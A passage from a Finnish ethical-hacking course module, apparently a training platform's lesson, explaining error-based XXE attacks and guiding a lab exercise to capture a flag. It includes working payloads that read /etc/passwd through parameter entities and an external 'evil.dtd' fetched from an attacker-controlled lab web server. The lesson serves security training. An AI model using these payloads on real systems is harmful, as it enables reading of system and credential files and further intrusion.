XXE (XML External Entity) Hyökkäykset

Virhepohjainen XXE Tekniikka

Keskitaso
45 min

Entä jos tulostetta ei olekaan?

Tähän asti olemme tutustuneet nk. Heijastettuihin (reflected) XXE-haavoittuvuuksiin, jossa XML:n sisältä palautetaan jotain takaisin selaimeen. Tällaisissa tapauksissa haavoittuvuuden hyväksikäyttö on yleensä aika helppoa, koska hyökkääjän ei tarvitse kuin lisätä XML:ään SYSTEM entiteetti sopivaan kohtaa XML:ää. Mutta mitä jos tulostetta ei olekaan?

Tällaisissa tapauksissa voimme usein turvautua tietojen vuotamiseen jonkun sivukanavan kautta. Tässä moduulissa keskitymme virhepohjaiseen tekniikkaan, jossa pyritään pakottamaan sovellus heittämään virheilmoitus jossa on halutun tiedoston sisältö.

Virhepohjainen tekniikka korkealla tasolla

Hyökkäys toimii seuraavasti:

 • Luodaan XML:ään entiteetti joka lukee halutun tiedoston.
 • Luodaan XML:ään toinen entiteetti, joka lukee tiedoston virheellisestä tiedostopolusta, joka sisältää halutun tiedoston sisällön.
 • Sovellus antaa virheilmoituksen viallisesta tiedostopolusta, joka vuotaa meille tiedoston.

Virhepohjainen tekniikka (hyökkääjälle) täydellisessä maailmassa

Teoriassa hyökkäys voitaisiin tehdä näin.

 • Luodaan parameter entiteetti file, jonka arvoksi tulee halutun tiedoston sisältö.
 • Luodaan parameter entiteetti all, joka rakentaa suoriutuessaan kolmannen entiteetin error, jonka arvoksi tulee: <!ENTITY error SYSTEM 'file:///virheellinen-polku/TIEDOSTON SISÄLTÖ TÄHÄN'>
 • Suoritetaan error entiteetti, joka aiheuttaa virheilmoituksen "VIRHEELLINEN TIEDOSTOPOLKU: virheellinen-polku/TIEDOSTON SISÄLTÖ TÄHÄN".

Ja sieltä virheilmoituksesta me sitten nähtäisiin se tiedosto mikä haluttiin nähdä. Hyökkäys voisi näyttää tältä:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY error SYSTEM 'file:///virheellinen-polku/%file;'>">
%file %all %error;

Mutta valitettavasti XML ei salli sisäkkäisiä entiteettejä saman XML-dokumentin sisältä.

Rajoituksen voi kuitenkin kiertää lataamalla DTD:n ulkoisesta XML-tiedostosta.

Virhepohjainen tekniikka reaalimaailmassa

Hyökkäys tehdään seuraavissa vaiheissa:

 • Asetetaan hyökkääjän HTTP-palvelin kuuntelemaan.
 • Lisätään hyökkääjän HTTP-palvelimelle ulkoinen DTD-tiedosto joka suoriutuessaan yrittää resolvoida SYSTEM entiteetin error jonka URL on “file:///virheellinen-polku/TIEDOSTON_SISÄLTÖ_JOKA_HALUTAAN_NÄHDÄ.
 • Tehdään sovellukselle lähetettävään XML:ään DTD jossa ladataan ulkoinen DTD, jolloin error entiteetti tulee XML:ään käytettäväksi.
 • Suoritetaan ulkoinen DTD viittaamalla siihen, jolloin sovellus heittää virheilmoituksen joka sisältää TIEDOSTON_SISÄLTÖ_JOKA_HALUTAAN_NÄHDÄ.

Harjoitus

Käynnistä tässä vaiheessa harjoitus, ja lue eteenpäin.

XXE OOB 1

Tässä labrassa hyödynnät XXE-haavoittuvuutta sovelluksessa joka ei heijastakaan mitään parametreja XML:stä. Joudut turvautumaan virhepohjaiseen tekniikkaan.

Tavoite

Lue lippu /secret-recipe.txt tiedostosta.

Tehtävät

Flag

Löydä lippu (flag) labraympäristöstä ja syötä se alle.

Hyökkääjän HTTP-kuuntelija

Sinulla on käytössäsi VSCode koodieditori (“Omat resurssisi - Attacker’s Code Editor”) sekä Apache web serveri joka kuuntelee jo (“Omat resurssisi - Web palvelin”). Voit avata VSCodesta uuden terminaalin ja ajaa seuraavan komennon voidaksesi seurata apachen lokeja.

tail -f /var/log/apache2/access.log

Web-palvelin tarjoilee tiedostoja /root/web -hakemistosta.

Ulkoinen DTD-tiedosto

Tallenna seuraava DTD-tiedosto tiedostoon /root/web/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY error SYSTEM 'file:///virheellinen-polku/%file;'>">
%all;

Tiedoston sisällön ymmärtäminen:

 • Ulkoinen (SYSTEM) parameter (tunnistaa prosenttimerkistä) entiteetti nimeltä file joka osoittaa tiedostoon “file:///etc/passwd”.
 • Parameter entiteetti nimeltä all joka suoritetaan (viimeisellä rivillä), jolloin lopputulokseksi DTD:hen jää entiteetti joka alunperin oli all sisällä.
 • Entiteetti error joka rakennetaan dynaamisesti suorittamalla entiteetti all. error on ulkoinen (SYSTEM) entiteetti joka osoittaa tiedostoon (file://) /virheellinen-polku/<TÄHÄN TULEE /etc/passwd TIEDOSTON SISÄLTÖ

Kun DTD on viittauksineen "rakentunut", evil.dtd entiteetin lopullinen arvo sisältää käytännössä:

<!ENTITY error SYSTEM ‘file://root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:...’>

Hyökkäys XML

Hyökkäys onnistuu, kun:

 • Lisäät XML:ään parameter entiteetin joka viittaa ulkoiseen DTD:hen.
 • Viittaat ulkoiseen DTD:hen niin, että se ladataan, suoritetaan ja asetettaisiin normaalisti osaksi XML-dokumentin DTD:tä. Tällä kertaa koodin suoritus kuitenkin kaatuu "suoritetaan" kohtaan koska tiedostoa joka yritetään hakea ei ole olemassa.

<!DOCTYPE order [
<!ENTITY % dtd SYSTEM
"http://web-b7dsfpuole.ha-student.com/evil.dtd">
%dtd;
]>

Huom. Kaikki XML-käsittelijät, mukaanlukien tämän labran XML-käsittelijä, eivät tue HTTPS:ää ulkoisen entiteetin URL-osoitteessa. Käytä siis salaamatonta http:ta URL:issa.

hakatemia pro

Valmis ryhtymään eettiseksi hakkeriksi?
Aloita jo tänään.

Hakatemian jäsenenä saat rajoittamattoman pääsyn Hakatemian moduuleihin, harjoituksiin ja työkaluihin, sekä pääset discord-kanavalle jossa voit pyytää apua sekä ohjaajilta että muilta Hakatemian jäseniltä.